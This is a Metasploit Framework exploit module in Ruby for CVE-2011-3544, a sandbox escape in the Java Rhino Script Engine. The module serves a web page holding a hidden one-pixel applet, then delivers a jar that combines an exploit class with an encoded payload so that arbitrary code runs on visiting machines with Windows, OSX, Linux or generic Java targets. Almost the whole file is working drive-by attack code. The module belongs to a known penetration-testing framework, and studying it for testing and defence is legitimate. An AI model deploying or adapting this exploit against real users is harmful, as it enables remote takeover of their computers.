1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  include Msf::Exploit::Remote::BrowserAutopwn
12
  autopwn_info({ javascript: false })
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',
19
        'Description' => %q{
20
          This module exploits a vulnerability in the Rhino Script Engine that
21
          can be used by a Java Applet to run arbitrary Java code outside of
22
          the sandbox.  The vulnerability affects version 7 and version 6 update
23
          27 and earlier, and should work on any browser that supports Java
24
          (for example: IE, Firefox, Google Chrome, etc)
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' => [
28
          'Michael Schierl', # Discovery
29
          'juan vazquez', # metasploit module
30
          'Edward D. Teach <teach[at]consortium-of-pwners.net>',
31
          'sinn3r'
32
        ],
33
        'References' => [
34
          [ 'CVE', '2011-3544' ],
35
          [ 'OSVDB', '76500' ],
36
          [ 'ZDI', '11-305' ],
37
          [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],
38
        ],
39
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
40
        'Targets' => [
41
          [
42
            'Generic (Java Payload)',
43
            {
44
              'Arch' => ARCH_JAVA
45
            }
46
          ],
47
          [
48
            'Windows Universal',
49
            {
50
              'Arch' => ARCH_X86,
51
              'Platform' => 'win'
52
            }
53
          ],
54
          [
55
            'Apple OSX',
56
            {
57
              'ARCH' => ARCH_X86,
58
              'Platform' => 'osx'
59
            }
60
          ],
61
          [
62
            'Linux x86',
63
            {
64
              'Arch' => ARCH_X86,
65
              'Platform' => 'linux'
66
            }
67
          ]
68
        ],
69
        'DefaultTarget' => 0,
70
        'DisclosureDate' => '2011-10-18',
71
        'Notes' => {
72
          'Reliability' => UNKNOWN_RELIABILITY,
73
          'Stability' => UNKNOWN_STABILITY,
74
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
75
        }
76
      )
77
    )
78
  end
79

80
  def on_request_uri(cli, request)
81
    if !request.uri.match(/\.jar$/i)
82
      if !request.uri.match(%r{/$})
83
        send_redirect(cli, get_resource + '/', '')
84
        return
85
      end
86

87
      print_status("#{name} handling request")
88

89
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
90
      return
91
    end
92

93
    paths = [
94
      [ 'Exploit.class' ]
95
    ]
96

97
    p = regenerate_payload(cli)
98

99
    jar = p.encoded_jar
100
    paths.each do |path|
101
      1.upto(path.length - 1) do |idx|
102
        full = path[0, idx].join('/') + '/'
103
        if !(jar.entries.map { |e| e.name }.include?(full))
104
          jar.add_file(full, '')
105
        end
106
      end
107
      fd = File.open(File.join(Msf::Config.data_directory, 'exploits', 'cve-2011-3544', path), 'rb')
108
      data = fd.read(fd.stat.size)
109
      jar.add_file(path.join('/'), data)
110
      fd.close
111
    end
112

113
    print_status('Sending Applet.jar')
114
    send_response(cli, jar.pack, { 'Content-Type' => 'application/octet-stream' })
115

116
    handler(cli)
117
  end
118

119
  def generate_html
120
    html = '<html><head></head>'
121
    html += '<body>'
122
    html += '<applet archive="Exploit.jar" code="Exploit.class" width="1" height="1">'
123
    html += '</applet></body></html>'
124
    return html
125
  end
126
end
127

128